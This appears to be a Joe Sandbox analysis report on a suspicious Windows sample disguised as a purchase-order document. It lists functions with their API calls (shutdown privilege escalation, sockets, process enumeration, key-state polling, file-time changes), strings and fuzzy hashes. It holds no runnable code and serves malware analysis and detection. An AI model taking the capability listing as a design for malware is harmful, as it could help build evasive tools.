Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B

Function 0047A999 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 288comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0047AA03
CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
_memset.LIBCMT ref: 0047AB7C
_wcslen.LIBCMT ref: 0047AC68
_memset.LIBCMT ref: 0047ACCD
CoCreateInstanceEx.OLE32 ref: 0047AD06
CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53

Strings

NULL Pointer assignment, xrefs: 0047AD84

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
String ID: NULL Pointer assignment
API String ID: 1588287285-2785691316
Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66

Function 004364AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
GetLastError.KERNEL32 ref: 00436504
ExitWindowsEx.USER32(?,00000000), ref: 00436527
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A

Strings

SeShutdownPrivilege, xrefs: 004364CF

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
String ID: SeShutdownPrivilege
API String ID: 2938487562-3733053543
Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D

Function 0043614F Relevance: 16.6, APIs: 11, Instructions: 103COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00436162
__swprintf.LIBCMT ref: 00436176

Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F

__wcsicoll.LIBCMT ref: 00436185
FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
LoadResource.KERNEL32(?,00000000), ref: 004361AE
LockResource.KERNEL32(00000000), ref: 004361B5
FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
LoadResource.KERNEL32(?,00000000), ref: 004361E4
SizeofResource.KERNEL32(?,00000000), ref: 004361F0
LockResource.KERNEL32(?), ref: 004361FD

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
String ID:
API String ID: 2406429042-0
Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68

Function 0045D517 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D522
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
GetLastError.KERNEL32 ref: 0045D59D
SetErrorMode.KERNEL32(?), ref: 0045D629

Strings

NOTREADY, xrefs: 0045D5DC
INVALID, xrefs: 0045D5CC
UNKNOWN, xrefs: 0045D5FC
READONLY, xrefs: 0045D5EC
READY, xrefs: 0045D5BC

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A

Function 0047AD92 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251comCOMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F

Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287

OleInitialize.OLE32(00000000), ref: 0047AE06

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

_wcslen.LIBCMT ref: 0047AE18
CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9

Strings

HH, xrefs: 0047ADE9

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
String ID: HH
API String ID: 1915432386-2761332787
Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A

Function 0044ED9A Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 448COMMON

Download Yara Rule

Strings

h, xrefs: 0044F029
`, xrefs: 0044ED9B
h, xrefs: 0044F872
DEFINE, xrefs: 0044F017

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: DEFINE$`$h$h
API String ID: 0-4194577831
Opcode ID: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
Opcode Fuzzy Hash: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56

Function 0046483C Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ErrorLast$bindclosesocketsocket
String ID:
API String ID: 2609815416-0
Opcode ID: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
Opcode Fuzzy Hash: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A

Function 0043701F Relevance: 10.6, APIs: 7, Instructions: 76processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
Process32NextW.KERNEL32(00000000,?), ref: 00437075
__wsplitpath.LIBCMT ref: 004370A5

Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2

_wcscat.LIBCMT ref: 004370BA
__wcsicoll.LIBCMT ref: 004370C8
CloseHandle.KERNEL32(00000000,?), ref: 00437105

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 2547909840-0
Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A

Function 00452126 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
FindClose.KERNEL32(?,?,00000000), ref: 004522C3

Strings

*.*, xrefs: 0045215E

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Find$File$CloseFirstNextSleep_wcslen
String ID: *.*
API String ID: 2693929171-438819550
Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A

Function 00436431 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0043643C
mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
__wcsicoll.LIBCMT ref: 00436466
mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C

Strings

DOWN, xrefs: 00436460

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __wcsicollmouse_event
String ID: DOWN
API String ID: 1033544147-711622031
Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD

Function 004741BB Relevance: 7.6, APIs: 5, Instructions: 137networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7

socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
WSAGetLastError.WSOCK32(00000000), ref: 00474233

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
Opcode Fuzzy Hash: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D

Function 00456354 Relevance: 7.6, APIs: 5, Instructions: 127keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(004A83D8), ref: 0045636A
ScreenToClient.USER32(004A83D8,?), ref: 0045638A
GetAsyncKeyState.USER32(?), ref: 004563D0
GetAsyncKeyState.USER32(?), ref: 004563DC
GetWindowLongW.USER32(?,000000F0), ref: 00456430

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AsyncState$ClientCursorLongScreenWindow
String ID:
API String ID: 3539004672-0
Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A

Function 004772DE Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51

IsWindowVisible.USER32 ref: 00477314
IsWindowEnabled.USER32 ref: 00477324
GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
IsIconic.USER32 ref: 0047733F
IsZoomed.USER32 ref: 0047734D

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9

Function 00436D2D Relevance: 7.6, APIs: 5, Instructions: 52filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D

Function 0044EBBC Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 551COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 0044EC49

Strings

h, xrefs: 0044F872
^, xrefs: 0044F7CD
ACCEPT, xrefs: 0044EBFE, 0044EC47

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _strncmp
String ID: ACCEPT$^$h
API String ID: 909875538-4263704089
Opcode ID: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
Opcode Fuzzy Hash: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56

Function 0045C999 Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
Opcode Fuzzy Hash: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
